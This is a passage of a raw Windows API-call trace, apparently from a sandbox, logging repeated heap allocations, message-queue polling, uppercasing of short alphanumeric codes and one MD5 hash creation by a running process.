[0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.115] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.115] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0161.115] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.115] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0161.115] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.115] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.115] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.116] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.116] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.117] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.132] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0161.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.132] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0161.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.133] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.134] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.134] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.135] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0161.135] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.135] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.135] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.135] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.135] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.136] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.136] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.136] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.136] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.136] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.136] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.136] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.136] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.137] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.137] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.137] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.138] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.138] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.138] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.139] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.140] RtlAllocateHeap 